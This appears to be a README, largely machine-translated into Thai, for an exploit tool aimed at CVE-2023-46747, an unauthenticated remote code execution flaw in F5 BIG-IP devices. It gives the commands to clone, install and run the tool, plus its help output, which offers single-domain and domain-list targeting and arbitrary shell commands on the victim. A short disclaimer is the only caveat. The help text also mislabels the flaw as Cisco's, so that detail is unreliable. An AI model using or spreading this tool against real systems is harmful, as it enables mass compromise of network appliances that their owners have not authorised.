สคริปต์การหาประโยชน์ที่พัฒนาขึ้นเพื่อใช้ประโยชน์จาก CVE-2023-46747 ซึ่งเป็นการเรียกใช้โค้ดระยะไกลก่อนการรับรองความถูกต้องของผลิตภัณฑ์ f5-BIG Ip นี่คือสคริปต์ที่เยื้องไว้เพื่อใช้ประโยชน์จากการเรียกใช้โค้ดระยะไกลบนผลิตภัณฑ์ f5-BIG Ip ที่มีช่องโหว่
git clone https://github.com/sanjai-AK47/CVE-2023-46747.git
cd CVE-2023-46747
pip install -r requirements.txt
python3 exploit.py
python3 exploit.py -h
usage: exploit.py [-h] [-d DOMAIN] [-dL DOMAINS_LIST] [-cmd COMMAND] [-o OUTPUT] [-to TIME_OUT] [-px PROXY] [-v]
[DESCTIPTION]: Exploitation and Detection tool for Cisco CVE-2023-46747
options:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
[INFO]: Target domain for exploiting without protocol eg:(www.domain.com)
-dL DOMAINS_LIST, --domains-list DOMAINS_LIST
[INFO]: Targets domain for exploiting without protocol eg:(www.domain.com)
-cmd COMMAND, --command COMMAND
[INFO]: Exploitation Shell command for Remote Code Execution
-o OUTPUT, --output OUTPUT
[INFO]: File name to save output
-to TIME_OUT, --time-out TIME_OUT
[INFO]: Switiching timeout will requests till for your timeout and also for BURPSUITE
-px PROXY, --proxy PROXY
[INFO]: Switiching proxy will send request to your configured proxy (eg: BURPSUITE)
-v, --verbose [INFO]: Switiching Verbose will shows offline targets
เครื่องมือนี้ได้รับการพัฒนาเพื่อใช้ประโยชน์จากช่องโหว่สำหรับการแสวงหาผลประโยชน์ทางกฎหมายและจริยธรรม และนักพัฒนา (ME) จะไม่รับผิดชอบต่อการแสวงหาผลประโยชน์ที่ผิดกฎหมายหรือผิดจริยธรรม
เครื่องมือนี้พัฒนาโดย D.Sanjai Kumar และสำหรับการอัปเดตและข้อผิดพลาดใดๆ ping ฉันผ่านหน้า Linkedin ของฉันที่ฉันได้กล่าวถึง
ขอบคุณ!